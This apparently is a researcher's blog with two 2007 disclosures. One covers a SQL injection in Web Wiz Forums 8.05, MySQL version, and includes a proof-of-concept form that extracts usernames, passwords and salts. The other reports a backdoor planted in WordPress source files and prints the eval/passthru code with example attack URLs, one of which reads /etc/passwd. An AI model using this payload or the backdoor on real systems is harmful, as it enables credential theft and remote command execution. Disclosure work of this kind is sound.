Tuesday, March 20, 2007

Web Wiz Forums 8.05 (MySQL version) SQL Injection

There is a vulnerability in MySQL version of Web Wiz Forums, free ASP bulletin board system software, enabling SQL injection. The vulnerability is in the code used to filter string parameters prior to including them in the SQL queries:

'Format SQL Query funtion
Private Function formatSQLInput(ByVal strInputEntry)
'Remove malisous charcters from sql
strInputEntry = Replace(strInputEntry, "\'", "\'", 1, -1, 1)
strInputEntry = Replace(strInputEntry, """", "", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "'", "''", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "[", "[", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "]", "]", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "<", "&lt;", 1, -1, 1)
strInputEntry = Replace(strInputEntry, ">", "&gt;", 1, -1, 1)
'Return
formatSQLInput = strInputEntry
End Function


Assume the user enters a string containing the following sequence of characters: \"' (a backslash, followed by a double quote followed by a single quote). The first line inside the function above would do nothing, the second line would remove the double quote, and after the third line the sequence would look like \'' (a backslash followed by two single quotes). In MySQL the first two characters would be interpreted as an escaped single quote and the third character would terminate the quotes thus allowing injection of arbitrary SQL code placed after it.

Only the MySQL version of the Web Wiz Forums is vulnerable to this as SQL Server and MS Access don't use backslash as an escape character.

Below I include a small exploit that demonstrates this vulnerability.

Mar 19th 2007: Vulnerability discovered
Mar 20th 2007: Vendor contacted
Mar 20th 2007: Vendor responded
Mar 20th 2007: Vendor released fixed version (8.05a)

<form method="post" action="http://localhost/forum/pop_up_member_search.asp?">
<input type="hidden" name="name" id="name" value="\&quot;&#039; union select concat(userusernamename,char(58),passpasswordword,char(58),sasaltlt) from tblautauthorhor /*" >
<input type="submit" value="Go">
</form>

Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }



this would enable remote command execution on machines running compromised versions, for example

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.

About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.